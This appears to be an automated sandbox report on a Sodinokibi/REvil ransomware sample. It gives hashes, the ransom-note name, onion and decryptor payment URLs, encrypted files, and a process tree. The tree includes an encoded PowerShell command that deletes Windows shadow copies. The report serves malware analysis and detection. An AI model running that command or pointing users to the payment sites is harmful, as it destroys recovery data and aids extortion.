Analysis
-
max time kernel
103s -
max time network
115s -
platform
windows7_x64 -
resource
win7 -
submitted
30-07-2020 16:07
Static task
static1
Behavioral task
behavioral1
Sample
lg.bin.exe
Resource
win7
Behavioral task
behavioral2
Sample
lg.bin.exe
Resource
win10
General
-
Target
lg.bin.exe
-
Size
290KB
-
MD5
5f58902825d15d59528f98faf43b86c3
-
SHA1
f09e5e72b433d11a32efe2e5d63db0bc7b8def59
-
SHA256
140f831ddd180861481c9531aa6859c56503e77d29d00439c1e71c5b93e01e1a
-
SHA512
5aae01c51f026e7382bf20117e81cc06a975f561370e7f9170b02bc83e329cc1737d82cf721f3901cf4c2c9180423bdaf6a375a109d05e9ca164c7c08970a3c6
Malware Config
Extracted
C:\m6x73942b6-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/0BDB1394373EB709
http://decryptor.cc/0BDB1394373EB709
Signatures
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
lg.bin.exepowershell.exepid process 1768 lg.bin.exe 1836 powershell.exe 1836 powershell.exe -
Drops file in Program Files directory 26 IoCs
Processes:
lg.bin.exedescription ioc process File opened for modification \??\c:\program files\RepairTest.TTS lg.bin.exe File opened for modification \??\c:\program files\ResetDeny.vstm lg.bin.exe File opened for modification \??\c:\program files\SearchGet.docx lg.bin.exe File opened for modification \??\c:\program files\UnblockDismount.mp4v lg.bin.exe File opened for modification \??\c:\program files\FormatMove.tiff lg.bin.exe File opened for modification \??\c:\program files\LimitGet.mov lg.bin.exe File opened for modification \??\c:\program files\PopUnlock.wmv lg.bin.exe File opened for modification \??\c:\program files\RepairInitialize.htm lg.bin.exe File opened for modification \??\c:\program files\SkipFormat.svgz lg.bin.exe File opened for modification \??\c:\program files\WriteGrant.midi lg.bin.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\m6x73942b6-readme.txt lg.bin.exe File opened for modification \??\c:\program files\CheckpointConfirm.vssm lg.bin.exe File opened for modification \??\c:\program files\CopyUnlock.xla lg.bin.exe File opened for modification \??\c:\program files\DisconnectOut.raw lg.bin.exe File opened for modification \??\c:\program files\InitializeRestart.mov lg.bin.exe File opened for modification \??\c:\program files\ResetResolve.tif lg.bin.exe File opened for modification \??\c:\program files\RestoreCompress.txt lg.bin.exe File created \??\c:\program files (x86)\m6x73942b6-readme.txt lg.bin.exe File opened for modification \??\c:\program files\BackupUnpublish.m4v lg.bin.exe File created \??\c:\program files\microsoft sql server compact edition\m6x73942b6-readme.txt lg.bin.exe File opened for modification \??\c:\program files\RemoveRename.nfo lg.bin.exe File opened for modification \??\c:\program files\SaveDisconnect.rle lg.bin.exe File opened for modification \??\c:\program files\SendMove.mp4 lg.bin.exe File opened for modification \??\c:\program files\ShowSearch.mhtml lg.bin.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\m6x73942b6-readme.txt lg.bin.exe File created \??\c:\program files\m6x73942b6-readme.txt lg.bin.exe -
Modifies extensions of user files 1 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
lg.bin.exedescription ioc process File renamed C:\Users\Admin\Pictures\LimitShow.tif => \??\c:\users\admin\pictures\LimitShow.tif.m6x73942b6 lg.bin.exe -
Enumerates connected drives 3 TTPs
-
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
lg.bin.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 1768 lg.bin.exe Token: SeDebugPrivilege 1836 powershell.exe Token: SeBackupPrivilege 2040 vssvc.exe Token: SeRestorePrivilege 2040 vssvc.exe Token: SeAuditPrivilege 2040 vssvc.exe Token: SeTakeOwnershipPrivilege 1768 lg.bin.exe -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
lg.bin.exedescription pid process target process PID 1768 wrote to memory of 1836 1768 lg.bin.exe powershell.exe PID 1768 wrote to memory of 1836 1768 lg.bin.exe powershell.exe PID 1768 wrote to memory of 1836 1768 lg.bin.exe powershell.exe PID 1768 wrote to memory of 1836 1768 lg.bin.exe powershell.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
lg.bin.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\v1lw78yfwa0g.bmp" lg.bin.exe -
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Modifies service 2 TTPs 5 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5} vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\lg.bin.exe"C:\Users\Admin\AppData\Local\Temp\lg.bin.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Drops file in Program Files directory
- Modifies extensions of user files
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- Sets desktop wallpaper using registry
PID:1768 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1836
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:1880
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
- Modifies service
PID:2040